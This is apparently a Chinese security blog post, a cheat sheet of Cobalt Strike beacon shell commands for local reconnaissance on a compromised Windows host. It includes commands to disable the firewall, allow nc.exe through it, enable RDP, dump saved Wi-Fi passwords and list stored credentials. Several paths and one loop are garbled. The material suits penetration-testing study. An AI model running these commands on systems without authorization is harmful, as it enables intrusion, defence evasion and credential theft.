免责声明!
本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法
。
大 纲
获取本机的网络配置信息:
shell ipconfig
查询操作系统和版本信息:
shell systeminfo
查询操作系统架构:
shell echo %PROCESSOR_ARCHITECTURE%
查询安装的软件及版本:
shell wmic product get name,version
或者,
shell powershell "Get-WmiObject -class win32_product | Select-Object -Property name,version"
查询本机运行的服务:
shell wmic service list brief
查询本机进程:
shell tasklist
或者,
shell wmic process list brief
查询本地电脑开机自启动程序:
shell wmic startup get command,caption
查询本地电脑计划任务:
shell schtasks /query /fo LIST /v
查询本地电脑开机时间:
shell net statistics workstation
查询本地电脑用户列表信息:
shell net user
或者,
shell wmic useraccount get name ,SID
查询本地电脑当前会话列表:
shell net session
查询本地电脑当端口信息:
shell netstat -ano
查询本地电脑补丁信息:
shell systeminfo
或者,
shell wmic qfe get Caption,Description,HotFixiD,InstalledOn
查询本地电脑杀软信息:
shell wmic /node:localhost /namespace:\rootsecuritycenter2 path antivirusproduct get displayname /format:list
查询本地电脑共享信息:
shell net share
或者,
shell wmic share get,name,path,status
查询本地电脑路由信息:
shell route print
查询本地电脑是否开启防火墙:
shell netsh firewall show state
关闭本地电脑防火墙:
(1) Windows server 2003及之前:
shell netsh firewall set opmode disable
shell netsh firewall set opmode disable
或者,
shell netsh advfirewall set allprofiles state off
shell netsh firewall add allowedprogram c:nc.exe"allownc" enable
(4) 2003之后的版本,允许指定的程序进行全部的连接:
shell netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:test.txt"
(5) 2003之后的版本,允许指定程序退出:
shell netsh advfirewall firewall add rule name="Allownc" dir=out action=allow program="C:test.txt"
(6) 2003之后的版本,允许3389端口放行:
shell netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow
开启本地电脑3389端口:
shell REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭本地电脑3389端口:
shell REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
获取本地电脑的WIFI密码信息:
shell for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles'
)
do @echo %j findstr -i -v echo netsh wlan show profiles %j key=clear
或者,
shell netsh wlan show profiles(列出所有连接过的wifi名称)
shell netsh wlan show profilename="搜出来的wifi名称" key=clear(获取某个wifi的密码)
查询本地电脑的RDP端口:
shell reg query HKLMsystemcurrentcontrolsetcontrolterminal" "serverwinstationsrdp-tcp /v portnumber
![内网篇 | CobaltStrike:深入探索本地信息收集技巧,干货!!!]()
查询本地电脑当前所保存的凭据:
shell cmdkey /l
![内网篇 | CobaltStrike:深入探索本地信息收集技巧,干货!!!]()
查询本地电脑的arp信息:
shell arp -a
![内网篇 | CobaltStrike:深入探索本地信息收集技巧,干货!!!]()
查询本地电脑最近打开的文件:
shell dir %APPDATA%MicrosoftWindowsRecent
查询本地电脑的本地工作组:
shell net localgroup
![内网篇 | CobaltStrike:深入探索本地信息收集技巧,干货!!!]()
查询本地电脑的RDP凭据:
shell dir /a %userprofile%AppDataLocalMicrosoftCredentials*
![内网篇 | CobaltStrike:深入探索本地信息收集技巧,干货!!!]()
没看够~?欢迎关注!
往期精彩推荐
漏洞复现篇 | Vite任意文件读取漏洞:CVE-2025-30208,最新!
漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927,速看!!!
漏洞复现篇 | CVE-2025-24813 Tomcat,最新RCE漏洞,速看!!!
Web篇 |【全网最详细】Apache CC反序列化漏洞:CC1调用链POC构造过程,干货!!!(上)
Web篇 | 一文掌握Java反序列化漏洞,干货!(上)
工具篇 | 把deepseek塞进微信:实现自动回复消息!王炸!!!
Web篇 | 一文掌握Java反序列化漏洞,干货!(上)
Web篇 | 一文掌握Apache Commons Collections反序列化漏洞,速看!!!(上)
工具篇 | 应急响应工具包,2025Hvv必备神器!!!
Web篇 | 一文掌握Apache Commons Collections反序列化漏洞,速看!!!(上)
内网篇 | 【送给小白的】内网信息收集:端口扫描详解,干货!!!
漏洞复现篇 | CVE-2025-24813 Tomcat,最新RCE漏洞,速看!!!
内网篇 | 史上最全的内网IP扫描攻略,干货!
红队必备:一文教你掌握pwd抓取技术,让你秒变高手!
Web篇 | 最强sqlmap联动burpsuite+WAF绕过姿势,Hvv面试必备!
内网篇 | 干货!深入解析NTLM协议:挑战-响应认证机制揭秘,红队必备!
SRC篇 | 今天你挖洞了吗?Webpack未授权访问漏洞,实战!
Web篇 | 技巧!布尔盲注-利用burpsuite实现半自动化
漏洞复现篇 | Ecshop SQL注入引起的任意代码执行漏洞
内网篇 | 干货!Windows系统本地认证
SRC篇 | 如此简单的逻辑漏洞,速看!!!
原文始发于微信公众号(零日安全实验室):内网篇 | CobaltStrike:深入探索本地信息收集技巧,干货!!!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论